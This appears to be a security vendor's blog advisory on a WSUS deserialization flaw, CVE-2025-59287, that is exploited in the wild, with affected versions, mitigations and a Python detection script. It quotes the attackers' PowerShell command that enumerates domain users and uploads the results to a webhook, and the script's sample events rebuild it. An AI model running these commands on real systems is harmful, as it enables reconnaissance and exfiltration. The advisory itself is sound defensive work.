On October 23rd, Microsoft released an unusual out-of-band security patch for CVE-2025-59287, a remote code execution vulnerability in WSUS (Windows server update services) that is being exploited in the wild.
What is WSUS?
WSUS (Windows server update services) is a service allowing IT managers and administrators to centrally manage, update and patch the organization’s computers. It downloads updates from Microsoft, stores them locally, and lets IT control which updates are approved, when they are distributed, and which computer groups receive them.
About CVE-2025-59287
This vulnerability was initially disclosed on October 14th and addressed in October’s Patch Tuesday, but on the 23rd Microsoft released an urgent update to the patch, as the original one was not comprehensive enough.
This vulnerability stems from inadequate type validation before deserialization: data sent to the vulnerable endpoint arrives in an encrypted cookie (named AuthorizationCookie), for example via a call like GetCookie().
The .NET BinaryFormatter.Deserialize() method then deserializes the decrypted cookie within the WSUS process context (SYSTEM), which allows arbitrary code to run.
Exploits in the wild
Since October 23rd, researchers have reported seeing exploitation of this vulnerability.
According to Huntress, the observed exploitation activity included spawning Command Prompt and PowerShell from the HTTP worker process and the WSUS service binary, decoding and executing a base64-encoded payload that enumerated servers for sensitive information and exfiltrated the results to a remote webhook, and the use of proxy networks by the attackers to conduct and obfuscate the exploitation.
Additionally, some researchers argue that the manner and speed with which the CVE was weaponized suggest the involvement of state actors or advanced ransomware gangs.
CISA has added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog and directed US federal civilian agencies to mitigate it by November 14, 2025.
Affected systems and IOCs
The vulnerability affects WSUS Server Role enabled installations on the following Windows Server versions:
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server 2022 (including 23H2, Server Core)
- Windows Server 2025 (Server Core)
(Affected-version list per NSFOCUS.)
If the WSUS Server Role is not enabled on the machine, then the machine is not vulnerable.
An affected system might exhibit:
- An anomalous rise in reconnaissance queries searching for users, system and active directory settings, passwords, sensitive network and user information
- Powershell.exe spawned from w3wp.exe and wsusservice.exe
- This script:
powershell -ec try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}
- Enumeration commands:
whoami;net user /domain net user /domain; ipconfig /all
Mitigation
- Apply the relevant patch to WSUS – you can find Microsoft’s guide here
- Restrict network access to the WSUS server – we recommend limiting all network access to WSUS servers, as they have significant control over the network; if that is not possible, it is important to close access to the known ports, 8530 and 8531
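The indicators listed above (PowerShell or Command Prompt spawned from w3wp.exe or wsusservice.exe, an encoded command that enumerates domain users and pushes the output to a webhook) translate directly into host-side detection logic that can run while patching and network restrictions are rolled out. The following Python is an added example written for this post; it is not Orca’s code or Microsoft’s, and the event records, file paths and the webhook URL placeholder in it are constructed to mimic Windows Security event 4688 (process creation) fields rather than taken from any real incident. It flags shell processes with a WSUS-component parent, unpacks any `-EncodedCommand` payload (PowerShell expects base64 over the UTF-16LE script bytes, and it tolerates stripped padding or an undecodable blob), and tags the decoded text with the behaviours reported for this CVE.

```python
"""Flag shell processes spawned by WSUS components and unpack any encoded
PowerShell they carry.  Sample events below are constructed for this example
(mimicking Windows Security event 4688 fields); they are not real telemetry."""
import base64
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Parent processes that should not normally be launching shells.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Post-exploitation behaviour reported for this CVE: user/AD enumeration and
# uploading the results to an external webhook.
INDICATORS = [
    ("domain-user-enumeration", re.compile(r"net\s+user\s+/domain", re.I)),
    ("whoami", re.compile(r"\bwhoami\b", re.I)),
    ("ipconfig-all", re.compile(r"ipconfig\s+/all", re.I)),
    ("webhook-exfil", re.compile(r"webhook\.site", re.I)),
    ("http-upload", re.compile(r"-Method\s+Put|--data-binary", re.I)),
]

# -ec / -e / -enc / -EncodedCommand followed by one base64 token.
_ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:ec|e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)(?=\s|$)", re.I)


def encode_powershell_command(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 over the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an encoded command, or None if absent/undecodable."""
    m = _ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # restore stripped '=' padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


@dataclass
class Finding:
    parent: str
    child: str
    command_line: str
    decoded: Optional[str]
    indicators: List[str]


def analyze_event(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding for a WSUS-parent -> shell-child event, else None."""
    parent = ntpath.basename(event.get("ParentProcessName", "")).lower()
    child = ntpath.basename(event.get("NewProcessName", "")).lower()
    if parent not in WSUS_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Match indicators against both the raw command line and the decoded script.
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, pat in INDICATORS if pat.search(haystack)]
    return Finding(parent, child, cmdline, decoded, hits)


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for f in (analyze_event(e) for e in events) if f is not None]


# Constructed sample events (paths and the webhook URL are placeholders).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXFIL_SCRIPT = ("$r = (net user /domain; ipconfig /all | out-string); "
                 "iwr -UseBasicParsing -Uri 'http://webhook.site/PLACEHOLDER' "
                 "-Body $r -Method Put")
SAMPLE_EVENTS = [
    {"ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": _PS,
     "CommandLine": "powershell -ec " + encode_powershell_command(_EXFIL_SCRIPT)},
    {"ParentProcessName": r"C:\Program Files\Update Services\Service\wsusservice.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": _PS,
     "CommandLine": "powershell -enc AAAA"},  # undecodable blob: still a finding
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": _PS,
     "CommandLine": "powershell -NoProfile -Command Get-Date"},  # benign lineage
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.parent} -> {f.child}: {f.indicators}")
```

The process-lineage check alone is the high-signal part: on a WSUS server the IIS worker process and WsusService.exe have no business launching shells, so a finding with an empty indicator list still deserves triage. The indicator tags are there to prioritise, not to gate the alert.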
How can Orca help?
The Orca Cloud Security Platform continuously scans for vulnerabilities in your cloud environments, including AWS, Azure, Google, Kubernetes, and others. When Orca finds a vulnerability, it will immediately create an alert and assign a risk score by considering the full contextual picture of the risk and the surrounding cloud environment so teams know which vulnerabilities need to be patched first.
The Orca Platform displays trending vulnerabilities in the “From the News” widget of the Orca dashboard. Users can see if their environment is vulnerable to CVE-2025-59287 and how to remediate it.

Orca also gives you complete visibility and insight into your attack surface, revealing how an attacker might use the vulnerability to exploit other risks and endanger high-value assets in your environment.
Learn more
If you’re interested in learning more about the Orca Platform and how it can help you protect against CVE-2025-59287 and other vulnerabilities, schedule a personalized 1:1 demo.
